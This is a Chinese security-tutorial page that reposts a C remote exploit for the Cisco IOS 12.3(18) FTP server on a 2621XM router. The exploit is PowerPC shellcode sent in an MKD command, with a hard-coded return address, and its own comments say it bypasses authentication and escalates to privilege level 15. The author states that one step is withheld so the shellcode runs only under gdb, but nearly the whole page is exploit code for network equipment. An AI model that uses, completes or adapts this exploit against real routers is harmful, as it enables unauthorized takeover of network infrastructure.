手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)
Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)
摘要:/*CiscoIOSFTPserverremoteexploitbyAndyDavis2008CiscoAdvisoryID:cisco-s...

/*Cisco IOS FTP server remote exploit by Andy Davis 2008

Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007

Specific hard-coded addresses for IOS 12.3

(18) on a 2621XM router

Removes the requirement to authenticate and escalates to level 15

*********************************************************************

To protect the innocent a critical step has been omitted, which means

the shellcode will only execute when the router is attached to gdb.

I'm sure the PowerPC shellcoders out there will work it out...

*********************************************************************

Thanks to Gyan Chawdhary and Varun Uppal for all the hours they spent

on the original IOS security research

iosftpexploit googlemail 'dot' com */#include

#include

#include

#include #define PORT 21int main(int argc, char **argv)

{

unsigned char sendbuf[] ="MKD "/* .equ vty_info, 0x8182da60 # pointer to VTY info */

/* .equ terminate, 0x80e4086c # kill a process */"x3cx80x81x83" /* lis 4,vty_info@ha */

"x38x84xdax60" /* la 4,vty_info@l

(4) */

"x7dx08x42x78" /* xor 8,8,8 */

"x7cxe4x40x2e" /* lwzx 7,4,8 */

"x91x07x01x74" /* stw 8,372

(7) */

"x39x08xffxff" /* subi 8,8,1 */

"x38xe7x09x1a" /* addi 7,7,233 */

"x91x07x04xca" /* stw 8,1226

(7) */

"x7dx03x43x78" /* mr 3,8 */

"x3cx80x80xe4" /* lis 4,terminate@ha */

"x38x84x08x6c" /* la 4,terminate@l

(4) */

"x7cx89x03xa6" /* mtctr 4 */

"x4ex80x04x20" /* bctr *//* exists cleanly without adversely affecting the FTP server */"x61x61x61x61" /* padding */

"x61x61x61x61" /* padding */

"x61x61x61x61" /* padding */

"x61x61x61x61" /* padding */

"x61x61x61x61" /* padding */

"x61x61x61x61" /* padding */"x80x06x23xB8" /* return address */

"x0dx0a";/* trampoline code */

/* when the overflow occurs r26 0x14 points to the shellcode */

/*

0x800623B8 lwz 26, 20

(26)

0x800623BC mtctr 26

0x800623C0 mr 3, 27

0x800623C4 bctrl

*/unsigned char recvbuf[256];

struct sockaddr_in servaddr;

int s;if (argc != 2)

{

printf ("nCisco IOS FTP server remote exploit by Andy Davis 2008n"); printf ("nUsage: %s n",argv[0]);

exit(-1);

}servaddr.sin_family = AF_INET;

servaddr.sin_addr.s_addr = inet_addr(argv[1]);

servaddr.sin_port = htons(PORT);s = socket(AF_INET, SOCK_STREAM, 0);

connect (s, (struct sockaddr *) &servaddr, sizeof(servaddr));

printf ("nCisco IOS FTP server remote exploit by Andy Davis 2008n");

printf ("Specific offsets for IOS 12.3

(18) on a 2621XM routernn");

printf ("Sending exploit...nn");if (send(s, sendbuf, sizeof(sendbuf)-1, 0) == 0)

{

printf("Error sending packet...quittingnn");

exit

(1);

}

recv (s, recvbuf, sizeof(recvbuf)-1,0);

printf ("Now telnet to the router for a shell...nn");

}

【Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)】相关文章:

360安全天巡功能介绍

ESET NOD32 最新激活码

NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit

腾讯电脑管家怎么定时关机

火绒安全系统右键菜单管理功能的使用方法

Java防止SQL注入的几个途径

关于杀毒软件安装使用的几个误区 杀毒软件也要慎用

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)

如何解决安全证书错误

WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit

精品推荐
分类导航